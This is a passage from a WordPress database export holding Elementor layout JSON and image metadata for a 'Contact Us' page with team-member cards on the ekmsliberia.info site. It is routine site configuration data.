Condensed\",\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#777777\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"flex-start\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"container_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false},{\"id\":\"29325d60\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7cf8d6a3\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":2301,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/team-14.jpg\"},\"member_first_name\":\"J.S. Datuama\",\"member_last_name\":\"Cammue\",\"member_position\":\"Founder & CEO\",\"member_description\":\"Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_font_family\":\"Oswald\",\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"last_name_typography_font_family\":\"Oswald\",\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_family\":\"Roboto Condensed\",\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#777777\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"flex-start\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"container_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false},{\"id\":\"5ac7adf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7fc35fde\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":2302,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/team-15.jpg\"},\"member_first_name\":\"David\",\"member_last_name\":\"Anderson\",\"member_position\":\"Founder & CEO\",\"member_description\":\"Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_font_family\":\"Oswald\",\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"last_name_typography_font_family\":\"Oswald\",\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_family\":\"Roboto Condensed\",\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#777777\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"left\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"container_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false},{\"id\":\"b70c70a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"44e5b7f1\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":2303,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/team-16.jpg\"},\"member_first_name\":\"Tom\",\"member_last_name\":\"Allen\",\"member_position\":\"Founder & CEO\",\"member_description\":\"Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_font_family\":\"Oswald\",\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"last_name_typography_font_family\":\"Oswald\",\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_family\":\"Roboto Condensed\",\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#777777\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"left\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false}],\"isInner\":false}]'),(14595,2315,'_wp_attached_file','2019/11/knowledge_manager_UV.jpg'),(14596,2315,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:573;s:4:\"file\";s:32:\"2019/11/knowledge_manager_UV.jpg\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"knowledge_manager_UV-300x246.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:246;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"knowledge_manager_UV-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"SM-N960U\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1573821032\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.3\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:17:\"0.041666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(14597,2316,'_elementor_edit_mode','builder'),(14598,2316,'_elementor_template_type','wp-page'),(14599,2316,'_elementor_version','2.7.5'),(14600,2316,'_wp_page_template','default'),(14601,2316,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4d9704de\",\"elType\":\"section\",\"settings\":{\"gap\":\"extended\",\"structure\":\"40\",\"padding\":{\"unit\":\"px\",\"top\":\"105\",\"right\":\"0\",\"bottom\":\"85\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"_id\":\"997f017\"}]},\"elements\":[{\"id\":\"75f1af0a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1eb2394d\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":2313,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\"},\"member_first_name\":\"J.S. Datuama\",\"member_last_name\":\"Cammue\",\"member_position\":\"UNCBD Focal Point\",\"member_description\":\"\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_font_family\":\"Oswald\",\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"last_name_typography_font_family\":\"Oswald\",\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_family\":\"Roboto Condensed\",\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#777777\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"flex-start\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"container_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false},{\"id\":\"29325d60\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7cf8d6a3\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":2301,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/team-14.jpg\"},\"member_first_name\":\"J.S. Datuama\",\"member_last_name\":\"Cammue\",\"member_position\":\"Founder & CEO\",\"member_description\":\"Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_font_family\":\"Oswald\",\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"last_name_typography_font_family\":\"Oswald\",\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_family\":\"Roboto Condensed\",\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#777777\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"flex-start\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"container_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false},{\"id\":\"5ac7adf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7fc35fde\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":2302,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/team-15.jpg\"},\"member_first_name\":\"David\",\"member_last_name\":\"Anderson\",\"member_position\":\"Founder & CEO\",\"member_description\":\"Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_font_family\":\"Oswald\",\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"last_name_typography_font_family\":\"Oswald\",\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_family\":\"Roboto Condensed\",\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#777777\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"left\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"container_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false},{\"id\":\"b70c70a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"44e5b7f1\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":2303,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/team-16.jpg\"},\"member_first_name\":\"Tom\",\"member_last_name\":\"Allen\",\"member_position\":\"Founder & CEO\",\"member_description\":\"Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_font_family\":\"Oswald\",\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"last_name_typography_font_family\":\"Oswald\",\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_family\":\"Roboto Condensed\",\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#777777\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto 